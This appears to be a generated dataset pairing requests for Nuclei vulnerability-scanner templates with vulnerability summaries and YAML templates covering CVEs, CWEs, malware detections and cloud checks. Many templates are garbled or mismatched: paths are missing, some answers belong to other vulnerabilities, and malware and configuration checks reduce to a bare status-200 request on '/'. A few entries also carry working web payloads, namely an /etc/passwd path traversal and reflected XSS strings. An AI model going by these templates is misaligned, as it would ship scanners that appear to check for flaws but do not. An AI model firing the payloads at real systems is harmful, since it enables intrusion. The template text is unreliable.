Severity: critical
Affected Products: wpb_show_core_project wpb_show_core
Indicators: error, vulnerability detected
|
id: CVE-2023-5974
info:
name: WordPress WPB Show Core <= 2.2 - Server-Side Request Forgery
author: ritikchaddha
severity: critical
description: The WPB Show Core WordPress plugin through version 2.2 is vulnerable to Server-Side Request Forgery (SSRF) via the 'path' parameter in the download-file.php script. This vulnerability allows unauthenticated attackers to make the server perform requests to arbitrary URLs.
tags: cve,cve2023,wp,wordpress,wp-plugin,ssrf,wpb-show-core,oast,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "wpb-show-core"
part: body
- method: GET
path:
matchers:
- type: word
words:
- "http"
part: interactsh_protocol
|
cve
|
critical
|
CVE-2023-5974
|
Generate a Nuclei template for: Ensure audit-log-path set
|
Title: Ensure audit-log-path set
Summary: Ensure audit-log-path set. Checks if the audit-log-path argument is properly set in the Kubernetes API server configuration, which is essential for maintaining a reliable audit trail.
Vulnerability Type: Security Check
Severity: medium
Indicators: vulnerability detected
|
id: audit-log-path-set
info:
name: Ensure audit-log-path set
author: princechaddha
severity: medium
description: Checks if the audit-log-path argument is properly set in the Kubernetes API server configuration, which is essential for maintaining a reliable audit trail.
tags: cloud,devops,kubernetes,devsecops,api-server,k8s,k8s-cluster-security
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
medium
|
audit-log-path-set
|
Generate a Nuclei template for CVE-2018-1207
|
Title: Code Injection in dell emc_idrac7 and others
Summary: Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain CGI injection vulnerability which could be used to execute remote code. A remote unauthenticated attacker may potentially be able to use CGI variables to execute remote code.
Vulnerability Type: Code Injection
Severity: critical
Affected Products: dell emc_idrac7, dell emc_idrac8
Indicators: error, vulnerability detected
|
id: dell-idrac-workflow
info:
name: Dell iDRAC Security Checks
author: kophjager007,megamansec
severity: info
description: A workflow to identify Dell iDRAC instances and run all related nuclei templates.
tags: unknown
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
cve
|
critical
|
CVE-2018-1207
|
Generate a Nuclei template for: Turla APT Malware - Detect
|
Title: Turla APT Malware - Detect
Summary: Turla APT Malware - Detect. Detects Turla malware based on sample used in the RUAG APT case
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: turla-malware-hash
info:
name: Turla APT Malware - Detect
author: pussycat0x
severity: info
description: Detects Turla malware based on sample used in the RUAG APT case
tags: malware,turla,apt,ruag
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
info
|
turla-malware-hash
|
Generate a Nuclei template for CVE-2022-2486
|
Title: OS Command Injection in wavlink wl-wn535k2_firmware and others
Summary: A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used.
Vulnerability Type: OS Command Injection
Severity: high
Affected Products: wavlink wl-wn535k2_firmware, wavlink wl-wn535k3_firmware
Indicators: error, vulnerability detected
|
id: CVE-2022-2486
info:
name: Wavlink WN535K2/WN535K3 - OS Command Injection
author: For3stCo1d
severity: critical
description: Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
tags: cve2022,cve,iot,wavlink,router,rce,oast,vkev,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "http"
part: interactsh_protocol
- type: status
status:
- 500
|
cve
|
high
|
CVE-2022-2486
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: ogugg
info:
name: Ogu.gg User Name Information - Detect
author: dwisiswant0
severity: info
description: Ogu.gg user name information check was conducted.
tags: osint,osint-social,ogugg,discovery
http:
- method: GET
path:
- "https://ogu.gg/{{user}}"
matchers:
- type: status
status:
- 200
- type: word
words:
- "Username History"
part: body
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for CVE-2020-8656
|
Title: SQL Injection in eyesofnetwork eyesofnetwork
Summary: An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.
Vulnerability Type: SQL Injection
Severity: critical
Affected Products: eyesofnetwork eyesofnetwork
Indicators: error, vulnerability detected
|
id: CVE-2020-8656
info:
name: EyesOfNetwork - Hardcoded API Key & SQL Injection
author: ritikchaddha
severity: critical
description: An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.
tags: cve,cve2020,eyesofnetwork,hardcoded-key,sqli,vuln,vkev
http:
- method: GET
path:
matchers:
- type: dsl
condition: and
- type: dsl
condition: and
|
cve
|
critical
|
CVE-2020-8656
|
Generate a Nuclei template for: Remove Expired SSL/TLS Certificates in AWS IAM
|
Title: Remove Expired SSL/TLS Certificates in AWS IAM
Summary: Remove Expired SSL/TLS Certificates in AWS IAM. Checks for expired SSL/TLS certificates from AWS IAM
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: iam-expired-ssl
info:
name: Remove Expired SSL/TLS Certificates in AWS IAM
author: princechaddha
severity: high
description: Checks for expired SSL/TLS certificates from AWS IAM
tags: cloud,devops,aws,amazon,iam,ssl,aws-cloud-config
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
high
|
iam-expired-ssl
|
Generate a Nuclei template for: NPM Anonymous CLI Metrics Exposure
|
Title: NPM Anonymous CLI Metrics Exposure
Summary: NPM Anonymous CLI Metrics Exposure. Tags: exposure, npm, config
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: npm-anonymous-cli
info:
name: NPM Anonymous CLI Metrics Exposure
author: DhiyaneshDK
severity: info
description: NPM Anonymous CLI Metrics Exposure
tags: exposure,npm,config,files,vuln
http:
- method: GET
path:
- "{{BaseURL}}/.npm/anonymous-cli-metrics.json"
- "{{BaseURL}}/anonymous-cli-metrics.json"
matchers:
- type: word
words:
- ""metricId":"
- ""metrics":"
- ""successfulInstalls":"
part: body
condition: and
- type: word
words:
- "application/json"
part: header
|
generic
|
info
|
npm-anonymous-cli
|
Generate a Nuclei template for: CPAS Management System - SQL Injection
|
Title: CPAS Management System - SQL Injection
Summary: CPAS Management System - SQL Injection. The CPAS Audit Management System V4 has been identified with an SQL injection vulnerability in the getCurserIfAllowLogin endpoint. This flaw allows unauthenticated remote attackers to exploit the system by injecting malicious SQL queries. Through this vulnerability, attackers can retrieve sensitive data from the database and, under high-privilege circumstances, upload malicious payloads such as web shells to the server. This could potentially lead to a ful
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: cpas-managment-sqli
info:
name: CPAS Management System - SQL Injection
author: s4e-io
severity: high
description: The CPAS Audit Management System V4 has been identified with an SQL injection vulnerability in the getCurserIfAllowLogin endpoint. This flaw allows unauthenticated remote attackers to exploit the system by injecting malicious SQL queries. Through this vulnerability, attackers can retrieve sensitive data from the database and, under high-privilege circumstances, upload malicious payloads such as web shells to the server. This could potentially lead to a full compromise of the server's system. The vulnerability is triggered via a crafted HTTP POST request containing a malicious ygbh parameter, making it a critical issue that requires immediate remediation to protect the integrity of the system.
tags: cpas,cms,sqli,time-based-sqli,vuln
http:
- method: GET
path:
matchers:
- type: dsl
- method: GET
path:
matchers:
- type: dsl
condition: and
|
generic
|
high
|
cpas-managment-sqli
|
Generate a Nuclei template for CVE-2019-17230
|
Title: Unknown Vulnerability in mageewp onetone
Summary: includes/theme-functions.php in the OneTone theme through 3.0.6 for WordPress allows unauthenticated options changes.
Vulnerability Type: Unknown Vulnerability
Severity: medium
Affected Products: mageewp onetone
Indicators: error, vulnerability detected
|
id: CVE-2019-17230
info:
name: WordPress OneTone theme <= 3.0.6 – Unauthenticated Options Changes
author: daffainfo
severity: medium
description: includes/theme-functions.php in the OneTone theme through 3.0.6 for WordPress allows unauthenticated options changes.
tags: cve,cve2019,wordpress,wp-theme,wp,onetone,vkev,vuln
http:
- method: GET
path:
matchers:
- type: dsl
condition: and
- method: GET
path:
matchers:
- type: dsl
condition: and
|
cve
|
medium
|
CVE-2019-17230
|
Generate a Nuclei template for: SFTPGo Admin - Setup
|
Title: SFTPGo Admin - Setup
Summary: SFTPGo Admin - Setup. SFTPGo Admin Password setup page has been exposed.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: sftpgo-admin-setup
info:
name: SFTPGo Admin - Setup
author: ritikchaddha
severity: high
description: SFTPGo Admin Password setup page has been exposed.
tags: sftpgo,misconfig,setup,vuln
http:
- method: GET
path:
- "{{BaseURL}}/web/admin/setup"
matchers:
- type: word
words:
- "SFTPGo - Setup"
- "SFTPGo you need to create an admin user"
part: body
condition: or
- type: status
status:
- 200
|
generic
|
high
|
sftpgo-admin-setup
|
Generate a Nuclei template for CVE-2024-31848
|
Title: Path Traversal in CVE-2024-31848
Summary: A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
Vulnerability Type: Path Traversal
Severity: critical
Indicators: error, vulnerability detected
|
id: CVE-2024-31848
info:
name: CData API Server < 23.4.8844 - Path Traversal
author: pussycat0x
severity: critical
description: A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
tags: cve,cve2024,cdata,lfi,vuln
http:
- method: GET
path:
- "{{BaseURL}}/login.rst"
matchers:
- type: word
words:
- "<title>CData - API Server</title>"
- method: GET
path:
matchers:
- type: word
words:
- ""items":[{"
- ":"true""
- "notifyemail"
part: body
condition: and
- type: word
words:
- "application/json"
part: header
- type: status
status:
- 200
|
cve
|
critical
|
CVE-2024-31848
|
Generate a Nuclei template for: Newcapec - Remote Code Execution
|
Title: Newcapec - Remote Code Execution
Summary: Newcapec - Remote Code Execution. Newcapec front-end service management platform service.action interface has a remote command execution vulnerability, attackers can use the vulnerability to obtain server permissions.
Vulnerability Type: Security Check
Severity: critical
Indicators: vulnerability detected
|
id: newcapec-rce
info:
name: Newcapec - Remote Code Execution
author: ritikchaddha
severity: critical
description: Newcapec front-end service management platform service.action interface has a remote command execution vulnerability, attackers can use the vulnerability to obtain server permissions.
tags: newcapec,rce,intrusive,vuln
http:
- method: GET
path:
matchers:
- type: dsl
condition: and
|
generic
|
critical
|
newcapec-rce
|
Generate a Nuclei template for: OilRig Malware Campaign Gen1 Hash - Detect
|
Title: OilRig Malware Campaign Gen1 Hash - Detect
Summary: OilRig Malware Campaign Gen1 Hash - Detect. Detects malware from OilRig Campaign
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: oilrig-malware-hash
info:
name: OilRig Malware Campaign Gen1 Hash - Detect
author: pussycat0x
severity: info
description: Detects malware from OilRig Campaign
tags: malware,oilrig,apt
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
info
|
oilrig-malware-hash
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: modoboa-panel
info:
name: Modoboa Login Panel - Detect
author: kh4sh3i
severity: info
description: Modoboa login panel was detected.
tags: panel,modoboa,mail,discovery
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/accounts/login/?next=/"
matchers:
- type: word
words:
- "Welcome to Modoboa"
part: body
- type: status
status:
- 200
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for CVE-2020-13158
|
Title: Path Traversal in articatech artica_proxy
Summary: Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter.
Vulnerability Type: Path Traversal
Severity: high
Affected Products: articatech artica_proxy
Indicators: error, vulnerability detected
|
id: CVE-2020-13158
info:
name: Artica Proxy Community Edition <4.30.000000 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Artica Proxy Community Edition before 4.30.000000 is vulnerable to local file inclusion via the fw.progrss.details.php popup parameter.
tags: cve,cve2020,artica,lfi,articatech,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers:
- type: regex
- type: status
status:
- 200
|
cve
|
high
|
CVE-2020-13158
|
Generate a Nuclei template for CVE-2023-3847
|
Title: Cross-Site Scripting (XSS) in moosocial moodating
Summary: A vulnerability classified as problematic was found in mooSocial mooDating 1.2. This vulnerability affects unknown code of the file /users of the component URL Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. VDB-235198 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.
Vulnerability Type: Cross-Site Scripting (XSS)
Severity: low
Affected Products: moosocial moodating
Indicators: error, vulnerability detected
|
id: CVE-2023-3847
info:
name: MooDating 1.2 - Cross-Site scripting
author: r3Y3r53
severity: medium
description: A vulnerability classified as problematic was found in mooSocial mooDating 1.2. This vulnerability affects unknown code of the file /users of the component URL Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely.
tags: cve2023,cve,packetstorm,xss,moodating,moosocial,vuln
http:
- method: GET
path:
- "{{BaseURL}}/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity"
matchers:
- type: dsl
condition: and
|
cve
|
low
|
CVE-2023-3847
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: cerebro-panel
info:
name: Cerebro Login Panel - Detect
author: huowuzhao,elder tao
severity: info
description: Cerebro login panel was detected.
tags: panel,cerebro,discovery
http:
- method: GET
path:
- "{{BaseURL}}/login"
matchers:
- type: word
words:
- "<title>Cerebro</title>"
part: body
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: twitter
info:
name: Twitter User Name Information - Detect
author: dwisiswant0
severity: info
description: Twitter user name information check was conducted.
tags: osint,osint-social,twitter,discovery
http:
- method: GET
path:
- "https://nitter.net/{{user}}"
matchers:
- type: status
status:
- 200
- type: word
words:
- "| nitter</title>"
part: body
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for: Dynatrace API Token
|
Title: Dynatrace API Token
Summary: Dynatrace API Token. Tags: dynatrace, token, exposure
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: dynatrace-api-token
info:
name: Dynatrace API Token
author: DhiyaneshDK
severity: info
description: Dynatrace API Token
tags: dynatrace,token,exposure,vuln
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: status
status:
- 200
|
generic
|
info
|
dynatrace-api-token
|
Generate a Nuclei template for: Uniform Bucket-Level Access Not Enforced
|
Title: Uniform Bucket-Level Access Not Enforced
Summary: Uniform Bucket-Level Access Not Enforced. Ensure that "Enforce uniform bucket-level access" policy is enabled for your Google Cloud Platform (GCP) organization in order to enforce uniform bucket-level access for all Google Cloud Storage buckets available in your organization. Enforcing uniform bucket-level access disables Access Control Lists (ACLs) for all Cloud Storage resources (buckets and objects) so that access is granted exclusively through Cloud IAM service.
Vulnerability Type: Security Check
Severity: medium
Indicators: vulnerability detected
|
id: gcloud-org-uniform-bucket-access
info:
name: Uniform Bucket-Level Access Not Enforced
author: princechaddha
severity: medium
description: Ensure that "Enforce uniform bucket-level access" policy is enabled for your Google Cloud Platform (GCP) organization in order to enforce uniform bucket-level access for all Google Cloud Storage buckets available in your organization. Enforcing uniform bucket-level access disables Access Control Lists (ACLs) for all Cloud Storage resources (buckets and objects) so that access is granted exclusively through Cloud IAM service.
tags: cloud,devops,gcp,gcloud,resourcemanager,security,storage,bucket,gcp-cloud-config
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
medium
|
gcloud-org-uniform-bucket-access
|
Generate a Nuclei template for CVE-2023-24733
|
Title: Cross-Site Scripting (XSS) in sigb pmb
Summary: PMB v7.4.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the query parameter at /admin/convert/export_z3950_new.php.
Vulnerability Type: Cross-Site Scripting (XSS)
Severity: medium
Affected Products: sigb pmb
Indicators: error, vulnerability detected
|
id: CVE-2023-24733
info:
name: PMB 7.4.6 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
tags: cve,cve2023,unauth,xss,pmb,pmb_project,sigb,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or"
matchers:
- type: word
words:
- "3@1=<script>alert(document.domain)</script>@"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200
|
cve
|
medium
|
CVE-2023-24733
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: linktree
info:
name: Linktree User Name Information - Detect
author: dwisiswant0
severity: info
description: Linktree user name information check was conducted.
tags: osint,osint-social,linktree,discovery
http:
- method: GET
path:
- "https://linktr.ee/{{user}}"
matchers:
- type: status
status:
- 200
- type: word
words:
- "| Linktree"
part: body
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: social-msdn
info:
name: Social msdn User Name Information - Detect
author: dwisiswant0
severity: info
description: Social msdn user name information check was conducted.
tags: osint,osint-social,social-msdn,discovery
http:
- method: GET
path:
- "https://social.msdn.microsoft.com/profile/{{user}}"
matchers:
- type: status
status:
- 200
- type: word
words:
- "Member Since"
part: body
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template to detect SQL Injection
|
Title: SQL Injection (CWE-89)
Summary: The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
Vulnerability Type: SQL Injection
Severity: critical
Indicators: vulnerability detected, error
|
id: vbulletin-ajaxreg-sqli
info:
name: vBulletin 3.x / 4.x AjaxReg - SQL Injection
author: mastercho
severity: critical
description: vBulletin versions 3.x and 4.x suffer from an AjaxReg remote blind SQL injection vulnerability.
tags: time-based-sqli,packetstorm,vbulletin,ajaxreg,sqli,vuln
http:
- method: GET
path:
matchers:
- type: dsl
condition: and
|
cwe
|
critical
|
CWE-89
|
Generate a Nuclei template for: Getresponse Takeover Detection
|
Title: Getresponse Takeover Detection
Summary: Getresponse Takeover Detection. Getresponse takeover was detected.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: getresponse-takeover
info:
name: Getresponse Takeover Detection
author: pdteam
severity: high
description: Getresponse takeover was detected.
tags: takeover,getresponse,vuln
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
- type: word
words:
- "With GetResponse Landing Pages, lead generation has never been easier"
|
generic
|
high
|
getresponse-takeover
|
Generate a Nuclei template for CVE-2021-35587
|
Title: Vulnerability (CWE-306) in oracle access_manager
Summary: Vulnerability in the Oracle Access Manager product of Oracle Fusion Middleware (component: OpenSSO Agent). Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in takeover of Oracle Access Manager. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Vulnerability Type: Vulnerability (CWE-306)
Severity: critical
Affected Products: oracle access_manager
Indicators: error, vulnerability detected
|
id: CVE-2021-35587
info:
name: Oracle Access Manager - Remote Code Execution
author: cckuailong
severity: critical
description: The Oracle Access Manager portion of Oracle Fusion Middleware (component: OpenSSO Agent) is vulnerable to remote code execution. Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. This is an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager.
tags: cve2021,cve,oam,rce,java,unauth,oracle,kev,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/oam/server/opensso/sessionservice"
matchers:
- type: word
words:
- "x-oracle-dms-ecid"
- "x-oracle-dms-rid"
part: header
condition: or
- type: word
words:
- "/oam/pages/css/general.css"
part: body
- type: status
status:
- 200
|
cve
|
critical
|
CVE-2021-35587
|
Generate a Nuclei template to detect Use of Hard-coded Credentials
|
Title: Use of Hard-coded Credentials (CWE-798)
Summary: The product contains hard-coded credentials, such as a password or cryptographic key. There are two main variations:
Inbound: the product contains an authentication mechanism that checks the input credentials against a hard-coded set of credentials. In this variant, a default administration account is created, and a simple password is hard-coded into the product and associated with that account. This hard-coded password is the same for each installation of the product, and it usually cann
Vulnerability Type: Use of Hard-coded Credentials
Severity: high
Indicators: vulnerability detected, error
|
id: chinaunicom-default-login
info:
name: China Unicom Modem Default Login
author: princechaddha
severity: high
description: Default login credentials were discovered for a China Unicom modem.
tags: chinaunicom,default-login,vuln
http:
- method: GET
path:
matchers:
- type: status
status:
- 302
- type: word
words:
- "/menu.gch"
part: header
|
cwe
|
high
|
CWE-798
|
Generate a Nuclei template for: JWay Products - Detect
|
Title: JWay Products - Detect
Summary: JWay Products - Detect. JWay products was detected.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: jway-products-detect
info:
name: JWay Products - Detect
author: righettod
severity: info
description: JWay products was detected.
tags: panel,jway,detect,discovery
http:
- method: GET
path:
- "{{BaseURL}}/generatedHomepage.html"
matchers:
- type: dsl
condition: and
|
generic
|
info
|
jway-products-detect
|
Generate a Nuclei template for: Universal 1337 Stealer Malware - Detect
|
Title: Universal 1337 Stealer Malware - Detect
Summary: Universal 1337 Stealer Malware - Detect. Tags: malware, file
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: universal-1337-malware
info:
name: Universal 1337 Stealer Malware - Detect
author: daffainfo
severity: info
description: Universal 1337 Stealer Malware - Detect
tags: malware,file
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
info
|
universal-1337-malware
|
Generate a Nuclei template for: ElasticSearch - Default Login
|
Title: ElasticSearch - Default Login
Summary: ElasticSearch - Default Login. Elasticsearch default credentials were discovered.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: elasticsearch-default-login
info:
name: ElasticSearch - Default Login
author: Mohammad Reza Omrani | @omranisecurity
severity: high
description: Elasticsearch default credentials were discovered.
tags: default-login,elasticsearch,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "Set-Cookie: sid="
- "kbn-license-sig:"
part: header
condition: and
- type: status
status:
- 200
|
generic
|
high
|
elasticsearch-default-login
|
Generate a Nuclei template for CVE-2021-42949
|
Title: Authentication Bypass in digitaldruid hoteldruid
Summary: The component controlla_login function in HotelDruid Hotel Management Software v3.0.3 generates a predictable session token, allowing attackers to bypass authentication via bruteforce attacks.
Vulnerability Type: Authentication Bypass
Severity: critical
Affected Products: digitaldruid hoteldruid
Indicators: error, vulnerability detected
|
id: unauth-hoteldruid-panel
info:
name: Hoteldruid Management Panel Access
author: princechaddha
severity: high
description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication.
tags: hoteldruid,panel,unauth,vuln
http:
- method: GET
path:
- "{{BaseURL}}/hoteldruid/inizio.php"
- "{{BaseURL}}/inizio.php"
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title> HotelDruid </title>"
- "<b>INSERT:</b>"
- "<b>TABLES:</b>"
part: body
condition: and
|
cve
|
critical
|
CVE-2021-42949
|
Generate a Nuclei template for: Ricoh Web Image Monitor - Detect
|
Title: Ricoh Web Image Monitor - Detect
Summary: Ricoh Web Image Monitor - Detect. Ricoh Web Image Monitor device was detected.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: ricoh-webimagemonitor-panel
info:
name: Ricoh Web Image Monitor - Detect
author: righettod
severity: info
description: Ricoh Web Image Monitor device was detected.
tags: panel,ricoh,detect,discovery
http:
- method: GET
path:
- "{{BaseURL}}/web/guest/en/websys/webArch/header.cgi"
matchers:
- type: dsl
condition: and
|
generic
|
info
|
ricoh-webimagemonitor-panel
|
Generate a Nuclei template for: Forgejo Repositories - Exposure
|
Title: Forgejo Repositories - Exposure
Summary: Forgejo Repositories - Exposure. The Forgejo repo is being exposed publically.
Vulnerability Type: Security Check
Severity: medium
Indicators: vulnerability detected
|
id: forgejo-repo-exposure
info:
name: Forgejo Repositories - Exposure
author: DhiyaneshDK
severity: medium
description: The Forgejo repo is being exposed publically.
tags: misconfig,exposure,forgejo,vuln
http:
- method: GET
path:
- "{{BaseURL}}/explore/repos"
matchers:
- type: word
words:
- "Powered by Forgejo"
- "Explore</a>"
- "Repositories"
part: body
condition: and
- type: status
status:
- 200
|
generic
|
medium
|
forgejo-repo-exposure
|
Generate a Nuclei template for: Audit Logging Disabled
|
Title: Audit Logging Disabled
Summary: Audit Logging Disabled. Check if audit logging for critical events is disabled.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: audit-logging-disabled
info:
name: Audit Logging Disabled
author: princechaddha
severity: high
description: Check if audit logging for critical events is disabled.
tags: windows,audit-logging,security,code,windows-audit
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
high
|
audit-logging-disabled
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: hudsonrock
info:
name: HudsonRock User Name Information - Detect
author: princechaddha,rxerium
severity: info
description: HudsonRock user name information check was conducted.
tags: osint,osint-security,hudsonrock,discovery
http:
- method: GET
path:
- "https://cavalier.hudsonrock.com/api/json/v2/osint-tools/search-by-username?username={{user}}"
matchers:
- type: status
status:
- 200
- type: word
words:
- "This username is associated with a computer that was infected by an info-stealer"
- "hudsonrock.com"
part: body
condition: and
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
